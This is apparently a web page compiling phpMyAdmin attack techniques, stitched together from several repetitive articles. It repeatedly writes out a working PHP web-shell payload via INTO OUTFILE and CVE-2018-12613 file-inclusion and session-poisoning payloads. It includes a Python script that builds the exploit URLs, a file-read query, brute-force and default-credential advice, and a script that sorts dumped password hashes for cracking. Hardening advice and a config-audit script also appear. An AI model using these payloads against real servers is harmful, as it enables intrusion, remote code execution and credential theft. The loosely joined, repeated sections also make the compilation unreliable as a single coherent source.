Phpmyadmin Hacktricks May 2026

Extract mysql.db → find linked databases and services (WordPress, Joomla, custom apps).


Stay curious, hack ethically, and always clean up after yourself.

To effectively conduct a penetration test or security audit on phpMyAdmin (PMA), it is essential to understand the path from initial access to Remote Code Execution (RCE). phpMyAdmin is a web-based interface for managing MySQL and MariaDB, which makes it a high-value target.

🔍 Initial Discovery and Enumeration

Before attempting an exploit, identify the version and configuration.

Version Detection: Check the /README or /ChangeLog files.

Default Credentials: Try root:root, root with an empty password, or admin:admin.

Setup Page: Check if /setup/index.php is accessible (allows server re-configuration).

Config Files: Look for config.inc.php backups or leaked credentials in .bash_history.

🔓 Authentication Bypass & Credential Access

If you cannot log in directly, look for misconfigurations that leak access.

Empty Password: Many local environments leave the root password blank.

Config File Leakage: If the server has a Local File Inclusion (LFI), target /etc/phpmyadmin/config.inc.php.

Brute Force: Use tools like Hydra or Burp Suite against the index.php login form.

🚀 Exploitation: From Access to RCE

Once authenticated (or via specific vulnerabilities), the goal is typically to execute commands on the underlying server.

1. SQL to Shell (INTO OUTFILE)

This is not SQL injection: you are running arbitrary queries as an authenticated user. If the MySQL user has the FILE privilege, you can write a web shell directly to the web root. Query:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

Requirements: you must know the absolute path of the web directory, the mysqld process must have OS write permission on it, and secure_file_priv must be empty or point at a directory under the web root (check with SHOW VARIABLES LIKE 'secure_file_priv'; a NULL value disables file writes entirely).

2. Local File Inclusion (LFI)

Older versions of phpMyAdmin are famous for LFI vulnerabilities.

CVE-2018-12613: Allows an authenticated user to include local files via the target parameter.

Payload: /index.php?target=db_sql.php%253f/../../../../../../etc/passwd (the ? is double-encoded so that the web server decodes it once and the vulnerable whitelist check decodes it a second time).

3. Session File Inclusion (Session Poisoning)

If LFI is possible but you cannot find a writable location for a shell, poison your own PHP session file: phpMyAdmin stores the executed query in the session, so the PHP tags end up on disk. Execute a query:

SELECT '<?php system($_GET["cmd"]); ?>';

Find your phpMyAdmin session ID (the value of the phpMyAdmin cookie).

Include the session file: /var/lib/php/sessions/sess_[YOUR_SID]. The directory is PHP's session.save_path; /var/lib/php/sessions is the Debian/Ubuntu default, other systems use /var/lib/php/session or /tmp.

🛠️ Post-Exploitation & Data Exfiltration

After gaining access to the database, move toward full system compromise.

User Table Dumping: Look for wp_users (WordPress) or users tables to crack hashes.

Privilege Escalation: Check whether the database user can call sys_eval() or other UDFs (User Defined Functions, e.g. from lib_mysqludf_sys) to run OS commands. Installing a new UDF requires the FILE privilege and write access to MySQL's plugin_dir, so an account that already has FILE can often bootstrap one.

Sensitive Information: Search for "password", "key", or "config" in all tables.

🛡️ Mitigation & Hardening

To secure a phpMyAdmin installation, follow these industry standards:

IP Whitelisting: Restrict access to specific IP addresses via .htaccess or Nginx config.

Two-Factor Authentication (2FA): Enable PMA's built-in 2FA support (configured per user under Settings; it requires the phpMyAdmin configuration storage database to be set up).

Disable Root Login: Force the use of non-privileged database users for daily tasks.

Update Regularly: Ensure you are on the latest stable branch to patch known LFI/CSRF flaws.
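The hardening list above maps onto concrete config.inc.php directives: $cfg['Servers'][$i]['AllowRoot'], ['AllowNoPassword'], ['AllowDeny'], $cfg['ForceSSL'] and $cfg['AllowArbitraryServer'] are real phpMyAdmin settings. As an added example (not phpMyAdmin project code), the following Python script audits a config.inc.php for those settings. The two sample configs embedded in it, one weak and one hardened, are constructed for the demonstration.

```python
"""Audit a phpMyAdmin config.inc.php for the hardening points listed above.

Added example, not phpMyAdmin's own code. The directive names are real
phpMyAdmin directives; the sample config text below is constructed.
"""
import re

# Constructed sample: an out-of-the-box config with risky settings.
WEAK_CONFIG = r"""
<?php
$cfg['blowfish_secret'] = 'changeme';
$i = 0;
$i++;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
$cfg['Servers'][$i]['AllowRoot'] = true;
$cfg['AllowArbitraryServer'] = true;
"""

# Constructed sample: the same server block after hardening.
HARDENED_CONFIG = r"""
<?php
$cfg['blowfish_secret'] = 'a-long-random-secret-set-at-install-time';
$i = 0;
$i++;
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['Servers'][$i]['AllowRoot'] = false;
$cfg['Servers'][$i]['AllowDeny']['order'] = 'deny,allow';
$cfg['Servers'][$i]['AllowDeny']['rules'] = ['allow % from 10.0.0.0/8'];
$cfg['ForceSSL'] = true;
$cfg['AllowArbitraryServer'] = false;
"""


def _directive(text, path):
    """Return the raw PHP value assigned to a $cfg path, or None if unset.
    `path` is the part after $cfg, e.g. "['Servers'][$i]['AllowRoot']"."""
    pattern = r"\$cfg" + re.escape(path) + r"\s*=\s*(.+?);"
    m = re.search(pattern, text)
    return m.group(1).strip() if m else None


def audit_pma_config(text):
    """Return a list of findings (strings); an empty list means all checks pass."""
    findings = []
    srv = "['Servers'][$i]"
    # AllowRoot defaults to true when unset, so only an explicit false passes.
    if _directive(text, srv + "['AllowRoot']") != "false":
        findings.append("AllowRoot is not false: root can log in through the web UI")
    # Passwordless logins are the classic 'empty root password' foothold.
    if _directive(text, srv + "['AllowNoPassword']") == "true":
        findings.append("AllowNoPassword is true: accounts with empty passwords can log in")
    # 'config' auth hardcodes one DB credential and logs every visitor in as it.
    if _directive(text, srv + "['auth_type']") == "'config'":
        findings.append("auth_type is 'config': hardcoded credentials, no per-user login")
    # No AllowDeny rules means no IP allow-list inside phpMyAdmin itself.
    if _directive(text, srv + "['AllowDeny']['order']") in (None, "''"):
        findings.append("AllowDeny order unset: no IP allow-list in phpMyAdmin itself")
    if _directive(text, "['ForceSSL']") != "true":
        findings.append("ForceSSL is not true: credentials may travel over plain HTTP")
    # Arbitrary server lets a user point PMA at a rogue MySQL server
    # (file read from the PMA host via LOAD DATA LOCAL INFILE).
    if _directive(text, "['AllowArbitraryServer']") == "true":
        findings.append("AllowArbitraryServer is true: users can connect PMA to a rogue MySQL server")
    if _directive(text, "['blowfish_secret']") in (None, "''", "'changeme'"):
        findings.append("blowfish_secret is missing or a placeholder: cookie auth is weakly protected")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_pma_config(cfg) or "no findings")
```

The audit only sees what config.inc.php contains: 2FA enrolment lives in the configuration storage, and IP restrictions enforced by .htaccess, Nginx or a firewall are invisible here, so run it alongside those checks rather than instead of them.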

In 2025 and early 2026, security reports for phpMyAdmin have shifted from simple misconfigurations to edge-case vulnerabilities involving library interactions and specific feature abuse. While classic HackTricks methods like SELECT ... INTO OUTFILE remain relevant for older systems, modern research focuses on authenticated XSS and library-level RCE.

Current Critical Vulnerabilities (2025-2026)

Recent advisories highlight that even patched systems can be vulnerable due to underlying server libraries:

CVE-2024-2961 (glibc/iconv RCE): A buffer overflow in glibc's iconv (the ISO-2022-CN-EXT converter) is reachable through phpMyAdmin and can potentially lead to Remote Code Execution. Condition: requires PHP's iconv extension to be loaded and the vulnerable character set to be used during export. Mitigation: upgrade to phpMyAdmin 5.2.2.

CVE-2025-24530 (XSS in "Check tables"): Authenticated users can trigger an XSS attack by using a specially crafted table or database name. Fixed in 5.2.2.

CVE-2025-24529 (XSS in "Insert"): An authenticated user can execute malicious scripts through the "Insert" tab functionality. Fixed in 5.2.2.

CVE-2022-0813 (Information Disclosure): Still flagged in early 2026 reports, this flaw lets attackers retrieve potentially sensitive information from phpMyAdmin 5.1.1 and earlier by sending invalid requests (the lang parameter, the pma_parameter and the cookie section are affected).

Advanced Exploitation Techniques (HackTricks Style)

Penetration testers and researchers from platforms like HackTricks categorize phpMyAdmin attacks into three main tiers:

Authenticated RCE via Local File Inclusion (LFI), CVE-2018-12613: Still the most common lab example for versions 4.8.0/4.8.1. Attackers use the target parameter to include session files into which they have previously injected PHP code.

Webshell via SQL misconfiguration (INTO OUTFILE): If the MySQL user has the FILE privilege and the webroot path is known, an attacker can write a shell directly to the server:

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

Client-side attacks (arbitrary file read): HackTricks notes that if an attacker can make phpMyAdmin connect to a malicious MySQL server (only possible when $cfg['AllowArbitraryServer'] is enabled; it is off by default), the rogue server can request LOAD DATA LOCAL INFILE and read files from the host running phpMyAdmin, which is the MySQL client in that exchange.

This is a story about Alex, a security researcher who used the HackTricks methodology to turn a forgotten database portal into a complete system takeover.

The Discovery

During a routine authorized assessment, Alex found a web server with a standard login page at /phpmyadmin. Many admins leave this tool exposed to the public internet, and it often serves as a primary entry point for attackers. Alex tried common credentials like admin:password, but the system was locked. He then checked for a config.inc.php.bak file, a common mistake where backup files containing plain-text passwords are left in the web directory. He found nothing, but he didn't give up.

The Breakthrough

Alex remembered a specific trick from the HackTricks pentesting guide: checking for setup scripts and default configurations. He navigated to /phpmyadmin/setup/. While modern versions block this, this older server allowed him to see the configuration. Using a known local file inclusion (LFI) vulnerability (the famous CVE-2018-12613, which needs an authenticated session), Alex was able to execute a small piece of PHP code he had "poisoned" into his session data.

From Database to Shell

Once he had authenticated, Alex didn't just want the data; he wanted the server. He followed these steps:

Checking Privileges: He verified he had the FILE privilege, which is required to read or write files on the server.

The "Into Outfile" Trick: He used a SQL command to write a simple web shell into the web root:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";

Command Execution: By visiting the shell at http://example.com/shell.php with a cmd parameter, he confirmed he was running commands as the web server user.

The Lesson

Alex's report helped the company understand that tools like phpMyAdmin should never be exposed to the public. To prevent this, he recommended:

Restricting Access: Web server access rules or firewall rules that only allow specific IP addresses.

Changing the URL: Moving the interface from /phpmyadmin to a random, obscure path.

Updating Regularly: Always running the latest version to patch known LFI and RCE vulnerabilities.

Managing databases through phpMyAdmin is standard for developers, but it remains a primary target for attackers due to its deep access to sensitive data. Following the methodology often cited in resources like HackTricks, penetration testers focus on misconfigurations, version-specific vulnerabilities, and post-authentication exploits to compromise web servers.

1. Initial Reconnaissance & Discovery

Before exploitation, attackers must locate and fingerprint the service.

Discovery: Common paths like /phpmyadmin/, /pma/, or /mysql/ are often found using directory brute-forcing tools like Gobuster or Nikto.

Information Leakage: Checking the /setup/index.php or /scripts/setup.php directories can sometimes reveal sensitive configuration data if the admin failed to restrict access.

Version Fingerprinting: Identifying the exact version (e.g., via the login page footer or /README) is critical, as many exploits are highly version-dependent.

2. Common Authentication Attacks

Default Credentials: Many installations still use root with no password or common defaults like admin/admin.

Authentication Bypass: Certain versions or add-ons (like the Portable phpMyAdmin WordPress plugin, version 1.3.0) have historically suffered from bypass vulnerabilities, allowing access without valid credentials.

Brute Force: If default logins fail, attackers may use automated tools to spray common database passwords.

3. Exploiting Vulnerabilities (The "HackTricks" Way)

Once access is gained, or if a pre-auth vulnerability exists, the focus shifts to gaining a shell.

Local File Inclusion (LFI) to RCE

One of the most famous exploits is CVE-2018-12613, affecting versions 4.8.0 and 4.8.1.
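The CVE-2018-12613 chain (a double-encoded target parameter plus PHP planted in the session file) is modelled below as an added Python example; it is not phpMyAdmin's code. check_page_validity_vulnerable() is a rendering of the whitelist check that 4.8.0/4.8.1 applied to an extra urldecode()d copy of the target and that the 4.8.2 patch removed; check_page_validity_fixed() drops that branch. The base URL, cookie value, install directory and session.save_path are constructed assumptions.

```python
"""Model of the CVE-2018-12613 whitelist check in phpMyAdmin 4.8.0/4.8.1 and
of the session-poisoning chain built on it.

Added example, not phpMyAdmin's code. Hosts, paths and the cookie value are
constructed assumptions.
"""
import posixpath
from urllib.parse import unquote

# Pages phpMyAdmin accepted as an include target (a subset of the real list).
GOTO_WHITELIST = {"db_sql.php", "db_structure.php", "tbl_sql.php", "sql.php"}


def _before_question_mark(page):
    # mb_substr($page, 0, mb_strpos($page . '?', '?')) in the PHP original
    return page.split("?", 1)[0]


def check_page_validity_vulnerable(page):
    """4.8.0/4.8.1 logic: also compares a urldecode()d copy of the target."""
    if page in GOTO_WHITELIST:
        return True
    if _before_question_mark(page) in GOTO_WHITELIST:
        return True
    decoded = unquote(page)  # the extra decode that turns %3f into '?'
    return _before_question_mark(decoded) in GOTO_WHITELIST


def check_page_validity_fixed(page):
    """4.8.2+ logic: no second decode, so %3f never becomes '?'."""
    if page in GOTO_WHITELIST:
        return True
    return _before_question_mark(page) in GOTO_WHITELIST


def included_path(pma_dir, target):
    """What include($_REQUEST['target']) resolves to. PHP normalises '..'
    lexically, so the non-existent 'db_sql.php%3f' component is simply
    stepped back over; posixpath.normpath models that behaviour."""
    return posixpath.normpath(posixpath.join(pma_dir, target))


def build_lfi_url(base, wanted_file, depth=6):
    """Double-encode '?' so the web server decodes it once (%253f -> %3f) and
    the vulnerable check decodes it a second time (%3f -> ?)."""
    target = "db_sql.php%253f/" + "../" * depth + wanted_file.lstrip("/")
    return f"{base}/index.php?target={target}"


def session_poison_chain(base, pma_cookie, save_path="/var/lib/php/sessions"):
    """Query that plants PHP into the session (phpMyAdmin keeps the SQL
    history in $_SESSION) and the LFI URL that includes that session file.
    save_path is an assumption: it is PHP's session.save_path on the target."""
    sql = "SELECT '<?php system($_GET[\"cmd\"]); ?>';"
    sess_file = f"{save_path}/sess_{pma_cookie}"
    return sql, sess_file, build_lfi_url(base, sess_file) + "&cmd=id"


if __name__ == "__main__":
    # What PHP sees after the web server's single round of URL decoding:
    t = "db_sql.php%3f/../../../../../../etc/passwd"
    print("vulnerable accepts:", check_page_validity_vulnerable(t))
    print("fixed accepts:", check_page_validity_fixed(t))
    print("include resolves to:", included_path("/var/www/html/phpmyadmin", t))
    print(session_poison_chain("http://10.0.0.5/phpmyadmin", "constructedsid123")[2])
```

The session step only works when the PHP process can read its own session directory through include, which is the normal case; on a host where session.save_path differs from the Debian default, adjust save_path before building the URL.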


Reading a file into a table (LOAD DATA INFILE): with the FILE privilege you can also pull a server file into a table and read it from the browser. Create a temporary table to hold the file contents, then load and select it:

CREATE TEMPORARY TABLE temp_table (line TEXT);
LOAD DATA INFILE '/etc/passwd' INTO TABLE temp_table LINES TERMINATED BY '\n' (line);
SELECT * FROM temp_table;

LOAD DATA INFILE is subject to the same FILE privilege and secure_file_priv restrictions as INTO OUTFILE.


phpMyAdmin is the most popular database management tool on the planet. Written in PHP, it provides a web-based interface to manage MySQL and MariaDB servers. While it is a godsend for developers, it is a prime target for attackers. If an adversary gains access to phpMyAdmin, the game is over — they can dump credentials, escalate privileges, and even gain remote code execution (RCE) on the host server.

In the spirit of HackTricks (the legendary repository for pentesting tricks), this article compiles the most effective techniques to abuse, bypass, and exploit phpMyAdmin installations.

Disclaimer: This article is for educational purposes and authorized security testing only. Unauthorized access to databases is illegal.


From the database, attackers can enumerate mysql.db to find which databases and applications share the server, dump password hashes from mysql.user for offline cracking, and search application tables for credentials, as the walkthrough and queries below show.

Target: https://target.com/phpmyadmin/ (version 4.8.1)

Step 1: Found accessible via dirb.
Step 2: Weak credentials admin:admin succeed.
Step 3: Run SHOW VARIABLES LIKE 'secure_file_priv'; → empty value (file writes are unrestricted).
Step 4: Write a shell via INTO OUTFILE to /var/www/html/uploads/cmd.php.
Step 5: Request https://target.com/uploads/cmd.php?cmd=id → uid=33(www-data).
Step 6: Read /etc/passwd and application configs, find another DB password, pivot to the production server.
Outcome: Full internal compromise.


SELECT user, host, plugin, authentication_string FROM mysql.user;

(On MySQL 5.6 and earlier the hash is in the password column instead.) Pick the Hashcat mode from the hash format, not from the server version: -m 300 for mysql_native_password (the 41-character *-prefixed SHA1 hash, MySQL 4.1+), -m 200 for the 16-hex-character pre-4.1 MySQL323 hash, -m 7400 for sha256_password ($5$ sha256crypt) and -m 7401 for the MySQL 8 default caching_sha2_password ($A$005$...).
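Because one mysql.user dump routinely mixes several plugins, the classification above is worth automating. The following Python snippet is an added example (not from the page's source material): it maps each stored hash to its plugin and Hashcat mode and groups them into runs. The sample rows are constructed; the *2470... value is the well-known mysql_native_password hash of "password", the other hashes are shape-correct placeholders rather than real credentials.

```python
"""Classify mysql.user hashes into their auth plugin and Hashcat mode.

Added example, not from the page's source material. The formats are MySQL's
documented ones; the sample rows are constructed placeholders.
"""
import re

# Constructed sample rows, as returned by
# SELECT user, host, plugin, authentication_string FROM mysql.user;
SAMPLE_ROWS = [
    ("root", "localhost", "mysql_native_password",
     "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"),
    ("legacy", "%", "mysql_old_password", "5d2e19393cc5ef67"),
    ("app", "10.0.%", "caching_sha2_password", "$A$005$" + "A" * 20 + "B" * 43),
    ("svc", "localhost", "sha256_password",
     "$5$rounds=5000$saltsaltsaltsaltsalt$" + "C" * 43),
    ("nopass", "localhost", "mysql_native_password", ""),
]

# (regex over the stored string, plugin guess, hashcat -m)
FORMATS = [
    (re.compile(r"^\*[0-9A-Fa-f]{40}$"), "mysql_native_password", 300),        # MySQL 4.1+
    (re.compile(r"^[0-9a-fA-F]{16}$"), "mysql_old_password (MySQL323)", 200),  # pre-4.1
    (re.compile(r"^\$A\$0\d\d\$.{63}$"), "caching_sha2_password", 7401),       # MySQL 8 default
    (re.compile(r"^\$5\$"), "sha256_password (sha256crypt)", 7400),
]


def classify_hash(stored):
    """Return (plugin_guess, hashcat_mode); mode is None when nothing to crack."""
    if stored == "":
        return ("empty password", None)
    for rx, plugin, mode in FORMATS:
        if rx.match(stored):
            return (plugin, mode)
    return ("unknown", None)


def crack_plan(rows):
    """Group hashes by Hashcat mode so each group becomes one hashcat run.
    Accounts with an empty password are reported separately: they need no
    cracking at all and are usually the first thing to try."""
    plan = {}
    empty = []
    for user, host, _plugin, stored in rows:
        guess, mode = classify_hash(stored)
        if mode is None:
            if guess == "empty password":
                empty.append(f"{user}@{host}")
            continue
        # hashcat -m 300 expects the 40 hex chars without the leading '*'.
        plan.setdefault(mode, []).append(stored.lstrip("*") if mode == 300 else stored)
    return plan, empty


if __name__ == "__main__":
    plan, empty = crack_plan(SAMPLE_ROWS)
    for mode, hashes in sorted(plan.items()):
        print(f"hashcat -m {mode} hashes_{mode}.txt wordlist.txt  # {len(hashes)} hash(es)")
    print("no password set:", empty)
```

The plugin column is authoritative when present; the regex fallback matters for older dumps where only the hash survived, and for spotting accounts whose plugin and stored format disagree after an upgrade.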

In the vast ecosystem of web hosting and database management, few tools are as ubiquitous and simultaneously as scrutinized as phpMyAdmin. Designed as a free, user-friendly interface to manage MySQL and MariaDB databases, it has become a staple for developers and system administrators worldwide. However, this very accessibility and power create a high-value target for malicious actors. The term "phpMyAdmin Hacktricks" refers not to a single exploit, but to a collection of techniques, misconfigurations, and creative attack paths that adversaries use to pivot from a simple web interface to complete server compromise. Understanding these tricks is less about learning to attack and more about learning to defend; it is an exercise in proactive security, revealing how small oversights can lead to catastrophic data breaches.

The most fundamental "hacktrick" against phpMyAdmin is the brute-force attack. Since phpMyAdmin presents a login page requiring a MySQL username and password, attackers launch credential-stuffing or dictionary attacks against it. The trick here is not technical sophistication but reconnaissance. Attackers scan for common login URLs like /phpmyadmin, /pma, or /dbadmin. Once discovered, the default root account with a weak or null password is the holy grail. The takeaway for defenders is immediate: change default credentials, enforce strong password policies, and implement account lockout mechanisms or two-factor authentication (2FA) where possible. Without these, phpMyAdmin is effectively a digital vault with a sticky note containing the combination on its frame.

Beyond authentication, a more dangerous class of tricks exploits the tool’s legitimate features. If an attacker successfully logs in, they do not immediately dump tables; they think laterally. For instance, using INTO OUTFILE or INTO DUMPFILE SQL commands, an attacker can write a malicious PHP web shell directly onto the web server. The trick is to find the server’s web root directory (e.g., /var/www/html/) and execute a query like: SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php". Suddenly, the database management tool becomes a launchpad for remote code execution (RCE). Defenders can mitigate this by ensuring the MySQL user does not have FILE privilege, configuring the secure_file_priv directive to restrict file operations to a safe directory, and properly separating database and web server permissions.

Another sophisticated hacktrick involves leveraging phpMyAdmin's own setup scripts or known bugs in older releases. Older versions contained vulnerabilities like CVE-2016-5734 (an authenticated remote code execution through preg_replace with the /e modifier, exploitable on PHP older than 5.4.7) or CVE-2018-12613 (a local file inclusion). Attackers maintain databases of these vulnerabilities and automate scanning for unpatched installations. The trick is not just to exploit the bug, but to chain it: using a file inclusion to read the system's /etc/passwd, then escalating privileges. The defensive countermeasure is brutally simple yet frequently ignored: keep phpMyAdmin updated. Automating patch management and removing the /setup directory from production servers eliminates entire classes of these attacks.

Perhaps the most insidious trick is using phpMyAdmin as a persistence or exfiltration point. Once inside, an attacker can create new, hidden database users with granular privileges, ensuring a backdoor even if the original password is changed. They can also use stored procedures or triggers to copy sensitive data out via SELECT ... INTO OUTFILE (which writes to the database server's own filesystem, from where the file is then retrieved through the web server or another channel), or even use MySQL's sys_exec() function from the lib_mysqludf_sys library to execute system commands. The defensive trick here is the principle of least privilege: the MySQL user used by phpMyAdmin should not be the global root user. Instead, create a specific user with only the necessary CRUD (Create, Read, Update, Delete) permissions on required databases, and disable dangerous functions.

From a blue-team perspective, the ultimate hacktrick is not any single exploit but the assumption that "it won't happen to me." Many defenders focus on firewalls and intrusion detection while neglecting application-layer hygiene. To truly secure phpMyAdmin, one must adopt a multi-layered strategy: move the login page to a non-standard URL (security through obscurity as a first, not only, layer), enforce HTTPS to prevent credential sniffing, bind phpMyAdmin to a localhost interface or a VPN-protected subnet, use a Web Application Firewall (WAF) to block suspicious SQL keywords, and regularly audit database logs for anomalies like INTO OUTFILE queries or repeated failed logins.

In conclusion, the world of "phpMyAdmin hacktricks" is a mirror reflecting both the ingenuity of attackers and the common failings of defenders. Each trick—be it brute force, file write abuse, legacy vulnerability exploitation, or persistence setup—originates from a mismatch between expected and actual security posture. For an ethical hacker or system administrator, studying these tricks is not about glorifying the attack but about internalizing the defense. By thinking like an adversary who sees phpMyAdmin as a treasure map, one can transform this powerful tool from a vulnerability magnet into a securely managed utility. The final hacktrick, then, belongs to the defender: the trick of staying one step ahead through vigilance, updates, and the relentless application of the principle of least privilege.

For those looking to assess the security of phpMyAdmin installations, HackTricks provides a comprehensive guide focused on reconnaissance and exploitation techniques. The methodology generally follows a path from basic identification to gaining Remote Code Execution (RCE).

1. Initial Reconnaissance & Login

Version Identification: Locate the version by checking the /README or /ChangeLog files, or look for the PMA_VERSION string in the page source.

Default Credentials: Always test common defaults like root:root, root:admin, or root with no password. Some systems may also have anonymous login enabled.

Weak Credentials: If defaults fail, attempt a dictionary attack. Note that many environments may lack rate limiting, though some may require a rate-limit bypass using headers like X-Forwarded-For.

2. Post-Authentication Exploitation

Once logged in, the primary goal is often to pivot from database access to server-level access.

Writing a Web Shell (SELECT ... INTO OUTFILE):

If the database user has FILE privileges and you know the absolute web path (e.g., /var/www/html), you can write a PHP shell directly to the disk.

Prerequisite check: Run SHOW VARIABLES LIKE '%secure_file_priv%'; to see whether file exports are restricted (NULL means file I/O is disabled, an empty value means unrestricted, a directory path limits writes to that directory).

Local File Inclusion (LFI) to RCE:

Vulnerability Example: Specific versions like 4.8.0 and 4.8.1 are vulnerable to a path traversal flaw (CVE-2018-12613).

Technique: Execute a SQL query containing PHP code (e.g., SELECT '<?php system($_GET["cmd"]); ?>';). Then include the session file (located at /var/lib/php/sessions/sess_[YOUR_SESSION_ID], where the ID is the value of your phpMyAdmin cookie) via the vulnerable target parameter to trigger the code.

3. Advanced Persistence and Attacks

Configuration Files: Check for config.inc.php which may contain hardcoded credentials for other services or the root database user.

PHP Wrappers: Use PHP wrappers (like php://filter) in conjunction with file inclusion vulnerabilities to read the source code of sensitive configuration files.

Summary of Common Vulnerabilities

Vulnerability    | Description
-----------------|----------------------------------------------------------------------------------------------
Default Creds    | Using common login pairs like root:root.
CVE-2018-12613   | LFI vulnerability in versions 4.8.0-4.8.1 used for RCE.
INTO OUTFILE     | Writing malicious scripts to the web root if permissions allow.
Setup Scripts    | Older versions may have a /setup directory left accessible which can be used to reconfigure the server.